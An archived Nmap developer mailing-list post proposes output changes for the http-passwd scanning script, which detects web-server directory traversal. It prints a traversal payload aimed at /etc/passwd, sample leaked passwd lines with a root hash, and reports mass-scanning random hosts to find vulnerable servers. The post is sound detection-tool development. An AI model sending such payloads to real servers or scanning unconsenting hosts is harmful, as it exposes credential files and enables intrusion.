Nmap Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: [NSE] Webservers Directory Traversal Vulnerability (under windows)

From: Gutek <ange.gutek () gmail com>
Date: Sun, 20 Jun 2010 08:52:12 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

just a small change (proposal) to keep a clean output.
Now the output depends on verbosity.

When -v < 1:
PORT   STATE SERVICE
80/tcp open  http
| http-passwd: Directory Traversal Found.
|_Payload: "../../../../../../../../../../etc/passwd"

When -v > 1:
PORT   STATE SERVICE
80/tcp open  http
| http-passwd: Directory Traversal Found.
| Payload: "../../../../../../../../../../etc/passwd"
| Printing first 250 bytes:
| root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh
| sshd:*:65532:65534::/:/bin/false
| ftp:*:65533:65534::/:/bin/false
|_nobody:*:65534:65534::/:/bin/false

BTW and for the record, after -iR tons of webservers so as to test the
script I've noticed a probability to find a vulnerable one of about 1
per 50000 (0.002%).
2/3 are Windows boxes, revealed by the 'boot.ini' payloads, 1/3 are *nix
ones. And among those last ones, many are Dreamboxes (see
http://en.wikipedia.org/wiki/Dreambox )

A.G.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (GNU/Linux)
Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org/

iEYEARECAAYFAkwdupwACgkQ3aDTTO0ha7gprACeJKJNLt09nLdZCNssMyIA/kQP
P9IAmwUN8PGr8miuotbB0mh7L2McNE99
=llg/
-----END PGP SIGNATURE-----

Attachment: http-passwd.nse
Description: 

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
Previous By Date Next
Previous By Thread Next

Current thread: